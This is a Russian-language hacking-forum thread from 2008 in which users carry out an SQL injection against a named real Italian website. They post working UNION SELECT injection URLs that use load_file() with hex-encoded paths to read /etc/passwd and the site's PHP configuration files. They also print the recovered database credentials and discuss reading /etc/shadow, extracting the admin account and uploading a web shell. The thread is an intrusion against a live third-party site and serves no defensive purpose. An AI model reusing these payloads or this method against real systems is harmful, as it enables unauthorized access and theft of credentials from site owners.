 |
|
08.01.2008, 02:02
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
http://forum.antichat.ru/thread49775.html
|
|
|
08.01.2008, 13:56
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
И как там "путешествовать"? Я пробыал почти что все, но он не пишет не ошибку...и ничего не выводит....скажи почему
|
|
|
|
09.01.2008, 14:20
|
|
Новичок
Регистрация: 08.01.2008
Сообщений: 5
С нами:
9652739
Репутация:
0
|
|
See Man
Код:
http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,Version(),USER(),load_file(0x2f6574632f706173737764),7,8/*
in you url have some error see
Код:
http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,load_file(0x2f6574632f70617%203737764),5,6,7,8/*
 |
|
|
|
10.01.2008, 02:30
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
|
|
Сообщение от Ky3bMu4
Если админ - лох, то можно попробывать заглянуть в etc/shadow
или /etc/master.passwd если это ФРЯ
|
|
|
|
10.01.2008, 02:36
|
|
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
С нами:
10475029
Репутация:
135
|
|
Сообщение от geezer.code
или /etc/master.passwd если это ФРЯ
да врятли получится, прав не хватит
|
|
|
|
10.01.2008, 02:45
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
С нами:
10488959
Репутация:
474
|
|
>Если админ - лох, то можно попробывать заглянуть в etc/shadow
Если админ лох, то тем не менее не думаю что он будет выставлять права на чтение=\
|
|
|
|
10.01.2008, 03:21
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от ENFIX
>Если админ - лох, то можно попробывать заглянуть в etc/shadow
Если админ лох, то тем не менее не думаю что он будет выставлять права на чтение=\
угу, это надо специально ведь выставлять, хотя мож в бэкапах какихнить и т.п. и можно найти жаль только это не фря
а админа супер секурным тоже назвать нельзя
$_DB['host'] = 'localhost';
$_DB['name'] = 'reload_priamo';
$_DB['user'] = 'root';
$_DB['pwd'] = '';
// tabelle
$_TABLE['admin'] = "cmsn_admin";
$_TABLE['dir'] ="cmsn_dir";
вобщем надо или httpd.conf (vhosts.conf) искать и там искать сайтенги на которых что нить типа phpmyadmin установлен
или просто аккаунт админа из скули выжимать, благо дело таблички есть (даже с префиксом)
__________________
Карфаген должен быть разрушен...
|
|
|
|
12.01.2008, 04:38
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от Scipio
угу, это надо специально ведь выставлять, хотя мож в бэкапах какихнить и т.п. и можно найти жаль только это не фря
а админа супер секурным тоже назвать нельзя
$_DB['host'] = 'localhost';
$_DB['name'] = 'reload_priamo';
$_DB['user'] = 'root';
$_DB['pwd'] = '';
// tabelle
$_TABLE['admin'] = "cmsn_admin";
$_TABLE['dir'] ="cmsn_dir";
вобщем надо или httpd.conf (vhosts.conf) искать и там искать сайтенги на которых что нить типа phpmyadmin установлен
или просто аккаунт админа из скули выжимать, благо дело таблички есть (даже с префиксом)
А где ты взял этот PHP код))?
|
|
|
|
12.01.2008, 06:33
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
при неправидьном запросе происходит ошибка с раскрытием путей (показывается имя скрипта с ошибкой и путь до него)
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/htdocs/cmsn/show.func.php on line 107
можно предположить, что гдето есть файл index.php, вместо show.func.php подставляем index.php и кодируем в хекс, полученный результат подставляем в sql запрос в функцию load_file() получаем:
Код:
http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,load_file(0x2F7661722F7777772F6874646F63732F636D736E2F696E6465782E706870),5,6,7,8/*
смотрим исходный код страницы и видим часть скрипта index.php, а имменно строчку
include("inc/config.inc.php");
подставляем закодированный в хекс аргумент функции include() в наш запрос, вместо index.php получаем:
Код:
http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,load_file(0x2F7661722F7777772F6874646F63732F636D736E2F696E632F636F6E6669672E696E632E706870),5,6,7,8/*
смотрим исходный код, видим строчку:
подставляем закодированный в хекс аргумент функции include() в наш запрос, вместо config.inc.php получаем:
Код:
http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,load_file(0x2F7661722F7777772F6874646F63732F636D736E2F696E632F64622E696E632E706870),5,6,7,8/*
смотрим исходный код, видим:
// parametri database
$_DB['host'] = 'localhost';
$_DB['name'] = 'reload_priamo';
$_DB['user'] = 'root';
$_DB['pwd'] = '';
// tabelle
$_TABLE['admin'] = "cmsn_admin";
$_TABLE['dir'] ="cmsn_dir";
__________________
Карфаген должен быть разрушен...
|
|
|
|
12.01.2008, 08:05
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами:
10242288
Репутация:
536
|
|
Кодирование кавычки не поможет в заливке шелла. При указании полного пути в конструкции INTO OUTFILE требуеться обрамлять его кавычками не закодированными. Короче при magic_quotes_gpc=on шелл через скуль не залить.
Нащет того, лох или наоброт не лох админ - лично мне никогда не встречался сервак, где веб сервер (или PHP если он не как модуль сервера) имеет привелегии рута (а ведь только он может читать shadow).
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
